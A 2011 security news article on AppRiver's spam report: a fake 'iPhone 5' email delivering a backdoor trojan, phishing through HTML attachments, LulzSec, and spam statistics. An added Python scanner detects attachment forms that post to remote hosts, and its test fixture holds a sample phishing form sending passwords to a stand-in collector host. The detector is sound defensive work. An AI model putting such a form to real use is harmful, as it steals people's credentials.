Spam campaign hypes the ‘iPhone 5’ but delivers malware

12 July 2011

Last month, spammers sent out an email advertising the new “iPhone 5”. The phone does not exist, and recipients who click on the email instead get a trojan designed to attack host PCs, according to AppRiver’s July Threat and Spamscape Report.

The advertisement has links to a malicious web page that hosts a file named iphone5.gif.exe. The file infects the users' PCs and creates a backdoor to the machine, the report found.

“The spam went out right before Apple’s World Wide Developers Conference, so it could snag a few people”, Fred Touchette, senior security analyst with AppRiver, told Infosecurity. The conference was held June 6-10 in San Francisco.

The report also found an increase in HTML spam, virus, and phishing attacks using attachments. The attachments are used to trick recipients into believing they are on a legitimate webpage, in order to veil the hackers’ true intentions.

“In this method, spammers send an attachment. Once it is opened, some people might be tricked into thinking they are visiting an actual webpage; in actuality, it is local to their machine. Once they fill out the phishing form and hit submit, [the information is sent] off to a website [where the hackers] are storing the information. That way, they can keep that site up and operational longer”, Touchette explained.
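The attachment technique described above can be screened for at the mail gateway. The following Python sketch is an added example, not code from AppRiver or the original article: it finds HTML attachments in a message and reports forms that submit to a remote server. The function names, sample message and domain are constructed for illustration.

```python
from email import message_from_bytes, policy
from email.message import EmailMessage
from html.parser import HTMLParser
from urllib.parse import urlparse


class FormCollector(HTMLParser):
    """Record each <form>'s action URL and whether it holds a password field."""

    def __init__(self):
        super().__init__()
        self.forms = []  # list of {"action": str, "password": bool}

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self.forms.append({"action": a.get("action") or "", "password": False})
        elif tag == "input" and self.forms and (a.get("type") or "").lower() == "password":
            self.forms[-1]["password"] = True


def scan_html_attachments(raw: bytes):
    """Return (filename, remote_host, has_password_field) for each form in an
    HTML attachment that submits to a remote http(s) server."""
    findings = []
    msg = message_from_bytes(raw, policy=policy.default)
    for part in msg.iter_attachments():
        name = part.get_filename() or ""
        is_html = (part.get_content_type() == "text/html"
                   or name.lower().endswith((".htm", ".html")))
        if not is_html:
            continue
        # Decode the bytes directly: HTML is often sent as application/octet-stream.
        html = (part.get_payload(decode=True) or b"").decode("utf-8", "replace")
        collector = FormCollector()
        collector.feed(html)
        for form in collector.forms:
            url = urlparse(form["action"])
            if url.scheme in ("http", "https") and url.hostname:
                findings.append((name, url.hostname, form["password"]))
    return findings


def build_sample() -> bytes:
    """Constructed test message; the file name and domain are placeholders."""
    msg = EmailMessage()
    msg["Subject"] = "Account verification"
    msg.set_content("Please open the attached form.")
    page = ('<form action="http://collector.example.test/save" method="post">'
            '<input name="user"><input type="password" name="pw"></form>')
    msg.add_attachment(page.encode(), maintype="application",
                       subtype="octet-stream", filename="statement.html")
    return msg.as_bytes()
```

A form inside an attached file that posts credentials to an outside host is rarely legitimate, so a finding with `has_password_field` set is a strong signal for quarantine or review.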

Another noteworthy occurrence in June was the rash of attacks by LulzSec against many governmental and corporate targets. “They were attacking public-facing web servers and databases, and the real damage they did…was releasing users’ passwords and all this personal information; it was really unnecessary”, Touchette said. “Overall, I think it was a publicity grab”, he added.

In terms of spam origination, Russia held onto the top spot for the third month in a row, according to the monthly spam report. South Korea jumped two spots to take third place, with India in second place.

By region, Asia was the top source of spam, making up 40.3% of spam origination worldwide. Europe was second, with 26.2% of the world total, and North America was third, with 16.2%.

According to the AppRiver report, the top 10 email-delivered viruses were: X.W32.Sasfis.pak, X.UPX.App.pakuber, W32\Mydoom.O, X.W32.Buzus.pak, W32\Mydoom.R_worm, X.W32.Netsky.Q, W32\Merond.O_worm, W32\Mydoom.N, W32\Netsky.C, and X.UPX.App.pakuberb. The virus names that begin with “X.” signify rules that were written by AppRiver analysts.

Spam activity started off slow, but spiked in the second week of June, when the AppRiver filters began to catch millions of pieces per day. “Though it is normal for virus traffic patterns to rise and fall with associated botnet activity, this wave seems to be remaining strong”, the report noted.

In addition, there was an increase in the use of the McDonald’s brand in spam. In June, emails began circulating claiming to be coupons for free food at the fast food chain, but the emails contained malware, not free food coupons, the report noted.
